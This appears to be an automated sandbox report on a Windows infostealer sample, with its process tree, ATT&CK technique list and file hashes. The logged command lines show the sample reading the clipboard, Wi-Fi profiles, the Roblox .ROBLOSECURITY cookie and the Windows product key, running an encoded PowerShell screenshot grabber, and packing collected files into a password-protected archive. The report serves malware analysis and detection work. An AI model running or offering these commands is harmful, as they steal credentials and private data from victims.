- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2472
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:5028
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:516
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:1896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2128
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2512
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:3904
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:4584
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3524
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:656
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wjrnktvz\wjrnktvz.cmdline"
        5⤵
        
        PID:2920
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8B67.tmp" "c:\Users\Admin\AppData\Local\Temp\wjrnktvz\CSC75B6C234A2584E3AB8AF2CE64248B773.TMP"
        6⤵
        
        PID:668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:348
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2652
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4308
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2628
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2408
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4572
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1032
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4472
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:864
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:1600
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\J3hLc.zip" *"
    3⤵
    PID:5088
  - - C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI49322\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\J3hLc.zip" *
      4⤵
      Executes dropped EXE
      PID:2332
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:1948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:2020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:1228
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:656
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:4048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1904
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4984
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2484

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2552 -ip 2552
1⤵
PID:1316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1204 -ip 1204
1⤵
PID:316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4640 -ip 4640
1⤵
PID:4496

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
cadef9abd087803c630df65264a6c81c

SHA1
babbf3636c347c8727c35f3eef2ee643dbcc4bd2

SHA256
cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438

SHA512
7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4711517ff5624095db27a149a6659eb9

SHA1
5129cde1a11103b30c2d25e3b46dcb66531a3d91

SHA256
3ae60d1bd034ef22a622ec97fb8ddc1aad5a4be8bb4cbc8ca220250ad4a57b3a

SHA512
1da51380746e395e781d150592022ff40e12fd82f71fec761e036b4605bb7239173c52a5c7d39c8ba272cbc52f46bc25e4394f41803d411b0817bdf6abcaa596

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17853c2782a29bae7aa9d733f585dc93

SHA1
4b5a105eadf3378b71e11591cbe6646aa4237d95

SHA256
c84fb8d554d8062ce96ae09bd06a22e12777c6646b205fe561f1e6d717c7dfc4

SHA512
b056c127a2966bf1b44281b111eaf2f85ef57ff15186c2013ceafef620f21d20c1c251d5b672790bd00be46270c69f07943577d79489b4c5393d320568e3de42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
548dd08570d121a65e82abb7171cae1c

SHA1
1a1b5084b3a78f3acd0d811cc79dbcac121217ab

SHA256
cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

SHA512
37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES8B67.tmp

Filesize
1KB

MD5
1bae2fee885bf199fb26aff64a14f2b7

SHA1
4b1acb94d158220d471dc6d6d7d6a9ff4ad3d812

SHA256
f2fe144035ee6661d1bf0248ba6c2429584ad25c4abccceb895c50db19f9cd26

SHA512
8a4528b5cf817346cc721083081fc4362b0d5d3602ce4b9c67caa8387d862ab27317584ad43b22228ea97fcb5a280e17e162ef92db5eaac0f43b0c527a04cba5

Download Submit
C:\Users\Admin\AppData\Local\Temp\ZVXe8EKMJlT9.bat

Filesize
202B

MD5
c4a7b9c8f7e4a85a3f528d227e6e1bcf

SHA1
f79a89318a4659cf0aaf7e69ac9b5b04f4231621

SHA256
0344f0d4f5ce717060c5c570ed33d6ec93e36879299503a2e444b761a66f5bcf

SHA512
37fb26871347d19d1e9ef2c91ca57eaf7bfa98d8bcd3ce8b01e6f678c127487429b54990c9edd7dff6f3e5493726adf86e339f83d624a08582db0020157c0eca

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49322\VCRUNTIME140.dll

Filesize
106KB

MD5
4585a96cc4eef6aafd5e27ea09147dc6

SHA1
489cfff1b19abbec98fda26ac8958005e88dd0cb

SHA256
a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736

SHA512
d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49322\_bz2.pyd

Filesize
48KB

MD5
554b7b0d0daca993e22b7d31ed498bc2

SHA1
ea7f1823e782d08a99b437c665d86fa734fe3fe4

SHA256
1db14a217c5279c106b9d55f440ccf19f35ef3a580188353b734e3e39099b13f

SHA512
4b36097eddd2c1d69ac98c7e98eebe7bb11a5117249ad36a99883732f643e21ecf58e6bea33b70974d600563dc0b0a30bead98bafb72537f8374b3d67979e60a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49322\_ctypes.pyd

Filesize
58KB

MD5
d603c8bfe4cfc71fe5134d64be2e929b

SHA1
ff27ea58f4f5b11b7eaa1c8884eac658e2e9248b

SHA256
5ee40bcaab13fa9cf064ecae6fc0da6d236120c06fa41602893f1010efaa52fe

SHA512
fcc0dbfbe402300ae47e1cb2469d1f733a910d573328fe7990d69625e933988ecc21ab22f432945a78995129885f4a9392e1cee224d14e940338046f61abe361

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49322\_decimal.pyd

Filesize
106KB

MD5
9cef71be6a40bc2387c383c217d158c7

SHA1
dd6bc79d69fc26e003d23b4e683e3fac21bc29cb

SHA256
677d9993bb887fef60f6657de6c239086ace7725c68853e7636e2ff4a8f0d009

SHA512
90e02054163d44d12c603debdc4213c5a862f609617d78dd29f7fd21a0bae82add4ceaf30024da681c2a65d08a8142c83eb81d8294f1284edfbeeb7d66c371c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49322\_hashlib.pyd

Filesize
35KB

MD5
32df18692606ce984614c7efda2eec27

SHA1
86084e39ab0aadf0ecfb82ce066b7bf14152961e

SHA256
b7c9c540d54ab59c16936e1639c6565cd35a8ca625f31753e57db9cbd0ee0065

SHA512
679f8956370edc4dee32475d8440a2d2f9b6dd0edd0e033e49fed7834a35c7ed51ccde0995d19ed0a559a4383b99ae8c11e4e686902db12a2a5e0a3f2c0f4a9d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI49322\_lzma.pyd

Filesize
85KB

MD5
01629284f906c40f480e80104158f31a

SHA1
6ab85c66956856710f32aed6cdae64a60aea5f0f

SHA256
a201ec286b0233644ae62c6e418588243a3f2a0c5a6f556e0d68b3c747020812

SHA512
